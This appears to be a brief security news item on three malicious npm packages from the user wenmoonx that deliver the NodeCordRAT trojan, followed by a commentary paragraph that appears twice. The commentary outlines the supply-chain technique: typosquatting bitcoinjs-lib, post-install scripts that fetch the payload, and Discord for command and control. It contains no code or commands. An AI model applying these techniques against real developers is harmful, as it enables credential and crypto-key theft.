Cybersecurity researchers recently identified three malicious npm packages uploaded by a user named wenmoonx that were designed to distribute a new remote access trojan dubbed NodeCordRAT.
Clever exploitation of developer trust in the npm ecosytem. The typosquating approach mimicking bitcoinjs-lib combined with post-install scripts to pull the payload is textbok supply chain attack stuff. Using Discord for C2 is pragmatic since its traffic blends into normal devloper workflows and encryped channels make detection harder. Worth noting this hits at the intersection of two high-value targets: crypto developers who likely hold keys and devs building financial infrastructure.
Clever exploitation of developer trust in the npm ecosytem. The typosquating approach mimicking bitcoinjs-lib combined with post-install scripts to pull the payload is textbok supply chain attack stuff. Using Discord for C2 is pragmatic since its traffic blends into normal devloper workflows and encryped channels make detection harder. Worth noting this hits at the intersection of two high-value targets: crypto developers who likely hold keys and devs building financial infrastructure.